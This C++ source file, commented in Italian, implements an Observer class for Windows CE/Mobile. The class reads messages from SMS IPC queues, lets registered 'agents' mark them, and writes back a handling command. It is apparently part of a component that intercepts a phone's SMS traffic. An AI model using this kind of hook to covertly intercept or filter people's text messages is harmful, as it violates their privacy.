#include "Observer.h"

/**
* La nostra unica reference a Observer. La gestione della concorrenza viene fatta internamente
*/
Observer* Observer::Instance = NULL;
volatile LONG Observer::lLock = 0;

Observer::Observer() : hQueueWrite(NULL), hQueueRead(NULL),
hObserverMutex(INVALID_HANDLE_VALUE), pRegistered(NULL), pQueue(NULL), 
iQueueCommand(EVENT_NOT_INTERESTING), pMsg(NULL), dwMsgLen(0), bRefresh(TRUE) {
	dwQueueBuf = 4 * 1024;

	hObserverMutex = CreateMutex(NULL, FALSE, NULL);

	// Prepariamo l'handling della coda IPC
	ZeroMemory(&qRead, sizeof(qRead));
	ZeroMemory(&qWrite, sizeof(qWrite));

	// Se chiamiamo la CreateMsgQueue() su una coda che gia' esiste
	// vengono utilizzati solo questi due parametri.
	qRead.dwSize = sizeof(qRead);
	qWrite.dwSize = sizeof(qWrite);
	qRead.bReadAccess = TRUE;
	qWrite.bReadAccess = FALSE;

	hQueueRead = OpenMsgQueue(GetModuleHandle(NULL), g_hSmsQueueRead, &qRead);

	if(hQueueRead == NULL)
		return;

	hQueueWrite = OpenMsgQueue(GetModuleHandle(NULL), g_hSmsQueueWrite, &qWrite);

	if(hQueueWrite == NULL)
		return;

	pQueue = new(std::nothrow) BYTE[dwQueueBuf];
}

Observer::~Observer() {
	if(hObserverMutex != INVALID_HANDLE_VALUE)
		CloseHandle(hObserverMutex);

	if(hQueueWrite)
		CloseMsgQueue(hQueueWrite);

	if(hQueueRead)
		CloseMsgQueue(hQueueRead);

	if(pQueue)
		delete[] pQueue;
}

Observer* Observer::self() {
	while (InterlockedExchange((LPLONG)&lLock, 1) != 0)
		Sleep(1);

	if(Instance == NULL)
		Instance = new(std::nothrow) Observer();

	InterlockedExchange((LPLONG)&lLock, 0);
	return Instance;
}


BOOL Observer::ReadQueue() {
	DWORD dwFlags;

	dwFlags = 0;

	if(pQueue == NULL || hQueueRead == NULL) 
		return FALSE;

	if(bRefresh == FALSE)
		return TRUE;

	ZeroMemory(pQueue, dwQueueBuf);

	if(ReadMsgQueue(hQueueRead, pQueue, dwQueueBuf, &dwMsgLen, 1000, &dwFlags) == FALSE) {
		bRefresh = TRUE;
		return FALSE;
	}

	pMsg = (pIpcMsg)pQueue;

	bRefresh = FALSE;
	return TRUE;
}

BOOL Observer::WriteQueue() {
	// Usiamo i 3 byte di packing per inviare il messaggio invece di
	// allocare spazio nella struttura
	IpcMsg pResponse;

	if(pMsg == NULL)
		return FALSE;

	ZeroMemory(&pResponse, sizeof(pResponse));

	// Segnaliamo alla coda cosa fare con il messaggio
	pResponse.dwForwarded = 0;
	pResponse.dwMsgLen = sizeof(UINT);
	pResponse.dwRecipient = pMsg->dwRecipient;
	pResponse.dwSender = pMsg->dwSender;
	CopyMemory(pResponse.Msg, &iQueueCommand, sizeof(iQueueCommand));

	// Proviamo a mandare il messaggio in ogni caso!
	return WriteMsgQueue(hQueueWrite, &pResponse, sizeof(IpcMsg), 1000, MSGQUEUE_MSGALERT);
}

BOOL Observer::ResetList() {
	list<Listeners>::iterator iter;

	if(pRegistered == NULL)
		return FALSE;

	for(iter = pRegistered->begin(); iter != pRegistered->end(); iter++) {
		(*iter).bProcessed = FALSE;
		(*iter).bDispatched = FALSE;
	}

	return TRUE;
}

BOOL Observer::Dispatch() {
	list<Listeners>::iterator iter;
	BOOL bComplete;

	// Chiamiamo la WriteQueue() solo se tutti i listener hanno markato il messaggio
	bComplete = TRUE;

	for(iter = pRegistered->begin(); iter != pRegistered->end(); iter++) {
		if((*iter).bDispatched == FALSE) {
			bComplete = FALSE;
			break;
		}
	}

	if(bComplete == FALSE)
		return TRUE;

	// Non abbiamo un messaggio, qualcosa e' andato storto
	if(pMsg == FALSE)
		return FALSE;

	bRefresh = TRUE;

	// Se iQueueCommand e' uguale EVENT_NOT_INTERESTING significa che l'evento non interessa 
	// a nessuno, quindi eseguiamo il comando di default per quell'evento.
	if(iQueueCommand == EVENT_NOT_INTERESTING) {
		// MANAGEMENT - Qui vanno aggiunte le azioni di default per ogni futuro evento
		switch(pMsg->dwSender) {
			case EVENT_SMS:
				iQueueCommand = IPC_PROCESS;
				break;

			default: 
				iQueueCommand = IPC_PROCESS;
				break;
		}
	}

	// Non siamo riusciti a scrivere nella coda, e' grave!!!
	if(WriteQueue() == FALSE)
		return FALSE;

	// Resettiamo la lista dei listener
	return ResetList();
}

// Un agente/evento non deve mai chiamare la Register() piu' di una volta senza aver
// chiamato prima la unregister.
BOOL Observer::Register(UINT uTid) {
	WAIT_AND_SIGNAL(hObserverMutex);
	Listeners part;

	if(pRegistered == NULL) {
		pRegistered = new(std::nothrow) list<Listeners>;

		if(pRegistered == NULL) {
			UNLOCK(hObserverMutex);
			return FALSE;
		}

		pRegistered->clear();
	}

	part.uTid = uTid;
	part.bProcessed = FALSE;
	part.bDispatched = FALSE;

	pRegistered->push_back(part);
	UNLOCK(hObserverMutex);
	return TRUE;
}

BOOL Observer::UnRegister(UINT uTid) {
	WAIT_AND_SIGNAL(hObserverMutex);
	list<Listeners>::iterator iter;

	if(pRegistered == NULL) {
		UNLOCK(hObserverMutex);
		return FALSE;
	}

	// Scorriamo tutta la lista... Giusto per rimuovere eventuali doppioni
	for(iter = pRegistered->begin(); iter != pRegistered->end();) {
		if((*iter).uTid == uTid)
			iter = pRegistered->erase(iter);
		else
			iter++;
	}

	UNLOCK(hObserverMutex);
	return TRUE;
}

const BYTE* Observer::GetMessage() {
	WAIT_AND_SIGNAL(hObserverMutex);

	if(ReadQueue() == FALSE) {
		UNLOCK(hObserverMutex);
		return NULL;
	}

	UNLOCK(hObserverMutex);
	return pQueue;
}

BOOL Observer::MarkMessage(UINT uTid, UINT uCommand, BOOL bProcessed) {
	WAIT_AND_SIGNAL(hObserverMutex);
	list<Listeners>::iterator iter;
	BOOL bRet;

	if(pRegistered == NULL) {
		UNLOCK(hObserverMutex);
		return FALSE;
	}

	// Scorriamo tutta la lista... Giusto per processare eventuali doppioni
	for(iter = pRegistered->begin(); iter != pRegistered->end(); iter++) {
		if((*iter).uTid == uTid) {
			(*iter).bProcessed = bProcessed;
			(*iter).bDispatched = TRUE;
		}
	}

	if(bProcessed)
		iQueueCommand = uCommand;

	bRet = Dispatch();

	UNLOCK(hObserverMutex);
	return bRet;
}